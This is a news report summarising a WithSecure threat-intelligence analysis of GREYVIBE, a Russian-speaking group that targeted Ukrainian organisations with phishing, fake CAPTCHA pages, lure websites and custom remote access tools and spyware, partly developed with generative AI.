GREYVIBE used AI in multi-vector cyberattacks on Ukraine

WithSecure identified a previously undocumented threat cluster called GREYVIBE that targeted Ukraine and Ukraine-related entities from at least August 2025. The firm described the group as Russian-speaking and operating largely in the Russian time zone, with activity aligned to Kremlin interests in the context of the Russo‑Ukrainian war.

The campaigns used multiple delivery methods, including spear-phishing emails linking to archives on Google Drive and 4sync, fake CAPTCHA pages that prompted users to run commands, fraudulent Ukrainian adult-club websites that pushed Android spyware, and charity-themed sites that delivered remote access tools. Victims included military, government, civilian and business organizations.

WithSecure mapped several named attack chains. PhantomMail used spear-phishing links to ZIP or RAR archives containing JavaScript loaders and decoy documents. PhantomRelay is a PowerShell-based remote access trojan that profiles hosts and executes PowerShell scripts and Windows commands. PhantomClick relied on ClickFix-style fake CAPTCHA pages to trick users into running commands that initiated PhantomRelay infections.

PrincessClub hosted fake adult-club sites to deliver FallSpy for Android and Windows RATs such as PhantomRelayV1 and LegionRelay; later lure sites added a WebRTC live-call feature to capture audio and video. DroneLink impersonated charitable foundations to distribute WireGuard and LegionRelay. Nebo used a FallSpy sample that mimicked a Russian-language login screen, likely to deceive Ukrainian personnel.

WithSecure found evidence the group used generative AI and large language models, including Ideogram AI, OpenAI ChatGPT and Google Gemini, to generate images and to assist in writing LegionRelay, obfuscation and loader scripts, backend components and post-compromise commands. Researcher Mohammad Kazem Hassan Nejad wrote, “The group has leveraged multiple attack vectors, including spear‑phishing e‑mails, fake captcha pages, and fraudulent Ukrainian adult club websites, to deliver malware to a diverse set of victims.”

Analysts described GREYVIBE as low-to-moderately sophisticated, producing custom components but showing operational security lapses. WithSecure noted AI use sped development and reduced reliance on known tools while also introducing design flaws that exposed parts of LegionRelay’s backend. Nejad added that frequent AI-generated changes could make clustering methods based on stable technical artifacts less reliable over time.

The report identified overlaps with the Russian cybercrime ecosystem. Evidence included possible use of an ISO builder linked to TrickBot and UAC‑0098, reuse of PhantomRelay variants in unrelated criminal activity such as a Microsoft Teams voice phishing campaign from July 2025 to February 2026 and a KongTuke delivery chain in early 2026, uploads of early development samples to VirusTotal, developer artifact names using internet slang, and a small deployment of the XMRig miner on infected machines.

WithSecure assigned moderate confidence that GREYVIBE has ties to cybercrime networks and low-to-moderate confidence that current or former cybercriminals are involved. The firm said the group may operate in a hybrid mode, with criminal actors absorbed into state tasking, criminal operators working under direction, or an ad hoc team taking on state-aligned assignments.

Technical notes in the report include PhantomRelayV1’s custom watchdog persistence, LegionRelay’s functions for file enumeration, exfiltration, screenshot capture, browser and messaging-app data theft, and tools to set up RDP access. FallSpy was identified as Android spyware capable of harvesting device data. The analysis documents iterative development, frequent refactoring and reuse of tools across campaigns since August 2025.

WithSecure published the full analysis with additional technical indicators and samples.